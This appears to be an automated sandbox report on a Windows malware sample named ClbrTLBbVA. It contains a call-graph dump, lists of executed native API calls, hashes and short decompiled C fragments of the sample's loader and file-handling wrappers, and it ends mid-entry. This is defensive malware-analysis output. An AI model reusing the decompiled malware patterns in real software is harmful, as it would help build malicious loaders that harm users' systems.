29972->29976 29975 41cf30 2 API calls 29974->29975 29979 414205 29975->29979 29976->29972 29977 41d060 3 API calls 29977->29979 29979->29977 29984 41423f 29979->29984 29980 414334 30101 41cf90 LdrLoadDll RtlFreeHeap 29980->30101 29982 41433e 30102 41cf90 LdrLoadDll RtlFreeHeap 29982->30102 30100 41cf90 LdrLoadDll RtlFreeHeap 29984->30100 29985 414348 30103 41cf90 LdrLoadDll RtlFreeHeap 29985->30103 29987 414352 30104 41cf90 LdrLoadDll RtlFreeHeap 29987->30104 29989->29849 29991 4153a1 29990->29991 29992 414a50 8 API calls 29991->29992 29994 4153b7 29992->29994 29993 41540a 29993->29853 29994->29993 29995 4153f2 29994->29995 29996 415405 29994->29996 29997 41bdc0 2 API calls 29995->29997 29998 41bdc0 2 API calls 29996->29998 29999 4153f7 29997->29999 29998->29993 29999->29853 30105 41ac30 30000->30105 30003 41ac30 LdrLoadDll 30004 41ad8d 30003->30004 30005 41ac30 LdrLoadDll 30004->30005 30006 41ad96 30005->30006 30007 41ac30 LdrLoadDll 30006->30007 30008 41ad9f 30007->30008 30009 41ac30 LdrLoadDll 30008->30009 30010 41ada8 30009->30010 30011 41ac30 LdrLoadDll 30010->30011 30012 41adb1 30011->30012 30013 41ac30 LdrLoadDll 30012->30013 30014 41adbd 30013->30014 30015 41ac30 LdrLoadDll 30014->30015 30016 41adc6 30015->30016 30017 41ac30 LdrLoadDll 30016->30017 30018 41adcf 30017->30018 30019 41ac30 LdrLoadDll 30018->30019 30020 41add8 30019->30020 30021 41ac30 LdrLoadDll 30020->30021 30022 41ade1 30021->30022 30023 41ac30 LdrLoadDll 30022->30023 30024 41adea 30023->30024 30025 41ac30 LdrLoadDll 30024->30025 30026 41adf6 30025->30026 30027 41ac30 LdrLoadDll 30026->30027 30028 41adff 30027->30028 30029 41ac30 LdrLoadDll 30028->30029 30030 41ae08 30029->30030 30031 41ac30 LdrLoadDll 30030->30031 30032 41ae11 30031->30032 30033 41ac30 LdrLoadDll 30032->30033 30034 41ae1a 30033->30034 30035 41ac30 LdrLoadDll 30034->30035 30036 41ae23 30035->30036 30037 41ac30 LdrLoadDll 30036->30037 30038 41ae2f 30037->30038 30039 41ac30 LdrLoadDll 30038->30039 30040 41ae38 30039->30040 30041 41ac30 LdrLoadDll 30040->30041 30042 41ae41 30041->30042 30043 41ac30 LdrLoadDll 30042->30043 30044 41ae4a 30043->30044 30045 41ac30 LdrLoadDll 30044->30045 30046 41ae53 30045->30046 30047 41ac30 LdrLoadDll 30046->30047 30048 41ae5c 30047->30048 30049 41ac30 LdrLoadDll 30048->30049 30050 41ae68 30049->30050 30051 41ac30 LdrLoadDll 30050->30051 30052 41ae71 30051->30052 30053 41ac30 LdrLoadDll 30052->30053 30054 41ae7a 30053->30054 30055 41ac30 LdrLoadDll 30054->30055 30056 41ae83 30055->30056 30057 41ac30 LdrLoadDll 30056->30057 30058 41ae8c 30057->30058 30059 41ac30 LdrLoadDll 30058->30059 30060 41ae95 30059->30060 30061 41ac30 LdrLoadDll 30060->30061 30062 41aea1 30061->30062 30063 41ac30 LdrLoadDll 30062->30063 30064 41aeaa 30063->30064 30065 41ac30 LdrLoadDll 30064->30065 30066 41aeb3 30065->30066 30067 41ac30 LdrLoadDll 30066->30067 30068 41aebc 30067->30068 30069 41ac30 LdrLoadDll 30068->30069 30070 41aec5 30069->30070 30071 41ac30 LdrLoadDll 30070->30071 30072 41aece 30071->30072 30073 41ac30 LdrLoadDll 30072->30073 30074 41aeda 30073->30074 30075 41ac30 LdrLoadDll 30074->30075 30076 41aee3 30075->30076 30077 41ac30 LdrLoadDll 30076->30077 30078 41aeec 30077->30078 30078->29857 30080 41af60 LdrLoadDll 30079->30080 30081 419edc 30080->30081 30111 16e9860 LdrInitializeThunk 30081->30111 30082 419ef3 30082->29778 30084->29855 30086 41af60 LdrLoadDll 30085->30086 30087 41a55c NtAllocateVirtualMemory 30086->30087 30087->29957 30089 41cf40 30088->30089 30090 41cf46 30088->30090 30089->29962 30091 41bf90 2 API calls 30090->30091 30092 41cf6c 30091->30092 30092->29962 30094 41cfd0 30093->30094 30095 41d02d 30094->30095 30096 41bf90 2 API calls 30094->30096 30095->29970 30097 41d00a 30096->30097 30098 41bdc0 2 API calls 30097->30098 30098->30095 30099->29967 30100->29980 30101->29982 30102->29985 30103->29987 30104->29989 30106 41ac4b 30105->30106 30107 414e50 LdrLoadDll 30106->30107 30108 41ac6b 30107->30108 30109 414e50 LdrLoadDll 30108->30109 30110 41ad17 30108->30110 30109->30110 30110->30003 30111->30082 30113 16e968f LdrInitializeThunk 30112->30113 30114 16e9681 30112->30114 30113->29863 30114->29863 30116 41a68c RtlFreeHeap 30115->30116 30117 41af60 LdrLoadDll 30115->30117 30116->29867 30117->30116 30119 407eb0 30118->30119 30120 407eab 30118->30120 30121 41bd40 2 API calls 30119->30121 30120->29786 30127 407ed5 30121->30127 30122 407f38 30122->29786 30123 419ec0 2 API calls 30123->30127 30124 407f3e 30125 407f64 30124->30125 30128 41a5c0 2 API calls 30124->30128 30125->29786 30127->30122 30127->30123 30127->30124 30129 41bd40 2 API calls 30127->30129 30134 41a5c0 30127->30134 30130 407f55 30128->30130 30129->30127 30130->29786 30132 40817e 30131->30132 30133 41a5c0 2 API calls 30131->30133 30132->29743 30133->30132 30135 41af60 LdrLoadDll 30134->30135 30136 41a5dc 30135->30136 30139 16e96e0 LdrInitializeThunk 30136->30139 30137 41a5f3 30137->30127 30139->30137 30141 41b5c3 30140->30141 30144 40acf0 30141->30144 30145 40ad14 30144->30145 30146 40ad50 LdrLoadDll 30145->30146 30147 409c4a 30145->30147 30146->30147 30147->29749 30149 40b063 30148->30149 30151 40b0e0 30149->30151 30164 419c90 LdrLoadDll 30149->30164 30151->29756 30153 41af60 LdrLoadDll 30152->30153 30154 40f1bb 30153->30154 30154->29759 30155 41a7d0 30154->30155 30156 41a7ef LookupPrivilegeValueW 30155->30156 30157 41af60 LdrLoadDll 30155->30157 30156->29761 30157->30156 30159 41a276 30158->30159 30160 41af60 LdrLoadDll 30159->30160 30161 41a27c 30160->30161 30165 16e9910 LdrInitializeThunk 30161->30165 30162 41a29b 30162->29762 30164->30151 30165->30162 30167 40b1f0 30166->30167 30168 40b040 LdrLoadDll 30167->30168 30169 40b204 30168->30169 30169->29698 30171 40ae51 30170->30171 30172 40ae4d 30170->30172 30173 40ae6a 30171->30173 30174 40ae9c 30171->30174 30172->29701 30216 419cd0 LdrLoadDll 30173->30216 30217 419cd0 LdrLoadDll 30174->30217 30176 40aead 30176->29701 30178 40ae8c 30178->29701 30180 40f4a0 3 API calls 30179->30180 30181 4143c6 30179->30181 30180->30181 30181->29703 30183 408a79 30182->30183 30218 4087a0 30182->30218 30185 408a9d 30183->30185 30186 4087a0 20 API calls 30183->30186 30185->29705 30187 408a8a 30186->30187 30187->30185 30236 40f710 10 API calls 30187->30236 30190 41af60 LdrLoadDll 30189->30190 30191 41a51c 30190->30191 30360 16e98f0 LdrInitializeThunk 30191->30360 30192 40c322 30194 40f4a0 30192->30194 30195 40f4bd 30194->30195 30361 419fc0 30195->30361 30198 40f505 30198->29709 30199 41a010 2 API calls 30200 40f52e 30199->30200 30200->29709 30202 41af60 LdrLoadDll 30201->30202 30203 41a02c 30202->30203 30367 16e9780 LdrInitializeThunk 30203->30367 30204 40c385 30204->29715 30204->29718 30207 41af60 LdrLoadDll 30206->30207 30208 41a07c 30207->30208 30368 16e97a0 LdrInitializeThunk 30208->30368 30209 40c459 30209->29726 30212 41af60 LdrLoadDll 30211->30212 30213 419e3c 30212->30213 30369 16e9a20 LdrInitializeThunk 30213->30369 30214 40c4ac 30214->29730 30216->30178 30217->30176 30219 407ea0 4 API calls 30218->30219 30234 4087ba 30218->30234 30219->30234 30220 408a49 30220->30183 30221 408a3f 30222 408160 2 API calls 30221->30222 30222->30220 30225 419f00 2 API calls 30225->30234 30227 41a490 LdrLoadDll NtClose 30227->30234 30230 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 30230->30234 30233 419e20 2 API calls 30233->30234 30234->30220 30234->30221 30234->30225 30234->30227 30234->30230 30234->30233 30237 419d10 30234->30237 30240 4085d0 30234->30240 30252 40f5f0 LdrLoadDll NtClose 30234->30252 30253 419d90 LdrLoadDll 30234->30253 30254 419dc0 LdrLoadDll 30234->30254 30255 419e50 LdrLoadDll 30234->30255 30256 4083a0 30234->30256 30272 405f60 LdrLoadDll 30234->30272 30236->30185 30238 419d2c 30237->30238 30239 41af60 LdrLoadDll 30237->30239 30238->30234 30239->30238 30241 4085e6 30240->30241 30273 419880 30241->30273 30243 4085ff 30248 408771 30243->30248 30294 4081a0 30243->30294 30245 4086e5 30246 4083a0 11 API calls 30245->30246 30245->30248 30247 408713 30246->30247 30247->30248 30249 419f00 2 API calls 30247->30249 30248->30234 30250 408748 30249->30250 30250->30248 30251 41a500 2 API calls 30250->30251 30251->30248 30252->30234 30253->30234 30254->30234 30255->30234 30257 4083c9 30256->30257 30339 408310 30257->30339 30260 41a500 2 API calls 30261 4083dc 30260->30261 30261->30260 30262 408467 30261->30262 30263 408462 30261->30263 30347 40f670 30261->30347 30262->30234 30264 41a490 2 API calls 30263->30264 30265 40849a 30264->30265 30265->30262 30266 419d10 LdrLoadDll 30265->30266 30267 4084ff 30266->30267 30267->30262 30351 419d50 30267->30351 30269 408563 30269->30262 30270 414a50 8 API calls 30269->30270 30271 4085b8 30270->30271 30271->30234 30272->30234 30274 41bf90 2 API calls 30273->30274 30275 419897 30274->30275 30301 409310 30275->30301 30277 4198b2 30278 4198f0 30277->30278 30279 4198d9 30277->30279 30282 41bd40 2 API calls 30278->30282 30280 41bdc0 2 API calls 30279->30280 30281 4198e6 30280->30281 30281->30243 30283 41992a 30282->30283 30284 41bd40 2 API calls 30283->30284 30285 419943 30284->30285 30291 419be4 30285->30291 30307 41bd80 30285->30307 30288 419bd0 30289 41bdc0 2 API calls 30288->30289 30290 419bda 30289->30290 30290->30243 30292 41bdc0 2 API calls 30291->30292 30293 419c39 30292->30293 30293->30243 30295 40829f 30294->30295 30297 4081b5 30294->30297 30295->30245 30296 414a50 8 API calls 30299 408222 30296->30299 30297->30295 30297->30296 30298 408249 30298->30245 30299->30298 30300 41bdc0 2 API calls 30299->30300 30300->30298 30302 409335 30301->30302 30303 40acf0 LdrLoadDll 30302->30303 30304 409368 30303->30304 30306 40938d 30304->30306 30310 40cf20 30304->30310 30306->30277 30333 41a580 30307->30333 30311 40cf4c 30310->30311 30312 41a1e0 LdrLoadDll 30311->30312 30313 40cf65 30312->30313 30314 40cf6c 30313->30314 30321 41a220 30313->30321 30314->30306 30316 40cf8f 30316->30314 30330 41a810 LdrLoadDll 30316->30330 30318 40cfa7 30319 41a490 2 API calls 30318->30319 30320 40cfca 30319->30320 30320->30306 30322 41a23c 30321->30322 30323 41af60 LdrLoadDll 30321->30323 30331 16e9710 LdrInitializeThunk 30322->30331 30323->30322 30324 41a257 30324->30316 30325 41af60 LdrLoadDll 30324->30325 30326 41a27c 30325->30326 30332 16e9910 LdrInitializeThunk 30326->30332 30327 41a29b 30327->30316 30330->30318 30331->30324 30332->30327 30334 41af60 LdrLoadDll 30333->30334 30335 41a59c 30334->30335 30338 16e9a00 LdrInitializeThunk 30335->30338 30336 419bc9 30336->30288 30336->30291 30338->30336 30340 408328 30339->30340 30341 40acf0 LdrLoadDll 30340->30341 30342 408343 30341->30342 30343 414e50 LdrLoadDll 30342->30343 30344 408353 30343->30344 30345 40835c PostThreadMessageW 30344->30345 30346 408370 30344->30346 30345->30346 30346->30261 30348 40f683 30347->30348 30354 419e90 30348->30354 30352 419d6c 30351->30352 30353 41af60 LdrLoadDll 30351->30353 30352->30269 30353->30352 30355 419eac 30354->30355 30356 41af60 LdrLoadDll 30354->30356 30359 16e9840 LdrInitializeThunk 30355->30359 30356->30355 30357 40f6ae 30357->30261 30359->30357 30360->30192 30362 41af60 LdrLoadDll 30361->30362 30363 419fdc 30362->30363 30366 16e99a0 LdrInitializeThunk 30363->30366 30364 40f4fe 30364->30198 30364->30199 30366->30364 30367->30204 30368->30209 30369->30214 30371 16e9540 LdrInitializeThunk

                                        Executed Functions

                                        Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39filenativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                                        APIs
                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: 1JA$rMA$rMA
                                        • API String ID: 2738559852-782607585
                                        • Opcode ID: b5b944df2376f48e40476b4721eebe737ab7416f2b547024fba2a46ef526a597
                                        • Instruction ID: 5f0bd78bb1628179abd2b6b753afab3609fd50d40dc772f4dcf02f555042c101
                                        • Opcode Fuzzy Hash: b5b944df2376f48e40476b4721eebe737ab7416f2b547024fba2a46ef526a597
                                        • Instruction Fuzzy Hash: C0F0F4B6200108AFCB08DF89DC81EEB77A9EF8C714F158249FE1D97241D630E951CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                                        APIs
                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: 1JA$rMA$rMA
                                        • API String ID: 2738559852-782607585
                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 244 40acf0-40ad19 call 41cc50 247 40ad1b-40ad1e 244->247 248 40ad1f-40ad2d call 41d070 244->248 251 40ad3d-40ad4e call 41b4a0 248->251 252 40ad2f-40ad3a call 41d2f0 248->252 257 40ad50-40ad64 LdrLoadDll 251->257 258 40ad67-40ad6a 251->258 252->251 257->258
                                        C-Code - Quality: 100%
                                        			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                        0x0040ad0c
                                        0x0040ad0f
                                        0x0040ad14
                                        0x0040ad19
                                        0x0040ad23
                                        0x0040ad28
                                        0x0040ad2b
                                        0x0040ad2d
                                        0x0040ad35
                                        0x0040ad3a
                                        0x0040ad3a
                                        0x0040ad41
                                        0x0040ad49
                                        0x0040ad4c
                                        0x0040ad4e
                                        0x0040ad62
                                        0x00000000
                                        0x0040ad64
                                        0x0040ad6a
                                        0x0040ad1e
                                        0x0040ad1e
                                        0x0040ad1e

                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                        • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                        • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 259 41a35a-41a3b1 call 41af60 NtCreateFile
                                        C-Code - Quality: 27%
                                        			E0041A35A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;
				void* _t34;
				void* _t37;
				void* _t38;

				_t38 =  >=  ?  *((void*)(__eax + 0x54)) : _t37;
				asm("cmpsd");
				0x845();
				_push(_t38);
				_t4 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t33, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28, _t34);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}








                                        0x0041a35a
                                        0x0041a35e
                                        0x0041a35f
                                        0x0041a360
                                        0x0041a36f
                                        0x0041a377
                                        0x0041a3ad
                                        0x0041a3b1

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 25ae6e8dc8cac7873104bc9be341a94afc566a6accba1bf871b7f778c19599fa
                                        • Instruction ID: acbc08f7017dbb4bbccb3bdccff5d418af212c641570f356a2999f0243731344
                                        • Opcode Fuzzy Hash: 25ae6e8dc8cac7873104bc9be341a94afc566a6accba1bf871b7f778c19599fa
                                        • Instruction Fuzzy Hash: 8A01F2B2200108AFCB08CF88DD80EEB33A9EF8C304F158249FA1C97241C630E851CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 263 41a360-41a376 264 41a37c-41a3b1 NtCreateFile 263->264 265 41a377 call 41af60 263->265 265->264
                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 266 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A48B Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 82%
                                        			E0041A48B(void* __eax, void* __ebx, void* __edx, intOrPtr _a4, void* _a8) {
				void* _v117;
				long _t13;
				void* _t20;
				void* _t21;

				asm("pushad");
				_t10 = _a4;
				_t4 = _t10 + 0x10; // 0x300
				_t5 = _t10 + 0xc50; // 0x40a943
				E0041AF60(_t20, _a4, _t5,  *_t4, 0, 0x2c, _t21);
				_t13 = NtClose(_a8); // executed
				return _t13;
			}







                                        0x0041a48b
                                        0x0041a493
                                        0x0041a496
                                        0x0041a49f
                                        0x0041a4a7
                                        0x0041a4b5
                                        0x0041a4b9

                                        APIs
                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 7712bb2b2bcc1ed50dd227d76b1e904893fe61dff779cd21372f85173e560420
                                        • Instruction ID: 556c69b9c41c8a3626ce8ab2d4fdf58d4d8dc37ab8fb110ffe89a9abc558f0b3
                                        • Opcode Fuzzy Hash: 7712bb2b2bcc1ed50dd227d76b1e904893fe61dff779cd21372f85173e560420
                                        • Instruction Fuzzy Hash: 97E08C75200114AFDB21DBB9CC85EEB7B69EF88264F1980A9B95CDB282D530E5018BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                        • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                        • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: b9ce5452db09d7bd4f9728ce46a17c07e4e5ac2b4d4e80187de2c0126eff4a3d
                                        • Instruction ID: c4834daff69cb7b6937ba5d0318fcb37648733c219d11887f5020fa7f304e995
                                        • Opcode Fuzzy Hash: b9ce5452db09d7bd4f9728ce46a17c07e4e5ac2b4d4e80187de2c0126eff4a3d
                                        • Instruction Fuzzy Hash: 46900265211000030105A9990B05607004AA7D5391352C025F2005550CD66198617161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 91b532559c47d152cd5cb44169d3698df2d22119d1807701fd48097e3a7f9425
                                        • Instruction ID: 50885c9d45e4014c4ca426a4844c3373af9554eb2d900847cf3ffc6dec538b68
                                        • Opcode Fuzzy Hash: 91b532559c47d152cd5cb44169d3698df2d22119d1807701fd48097e3a7f9425
                                        • Instruction Fuzzy Hash: 419002B120100402D140759948057470009A7D0341F52C015A6054554EC6999DD576A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: bd0186d3fb9fec0838239934b7cde9e9ecbfc8f95433c4c014f5999126ba1116
                                        • Instruction ID: fe133f093e4e976c15726449dc0b3253d1b10edc5ea800981d0e90676e85dc06
                                        • Opcode Fuzzy Hash: bd0186d3fb9fec0838239934b7cde9e9ecbfc8f95433c4c014f5999126ba1116
                                        • Instruction Fuzzy Hash: D69002A120200003410575994815717400EA7E0241B52C025E2004590DC56598917165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 586d868c8a1fe8ae347353fdebda7506de9c2f49ebf67a806d4c6713cc505b8d
                                        • Instruction ID: ea62d046a8936711a0b4710a01fd68c79427b5b89adb2938183d369167cf40c6
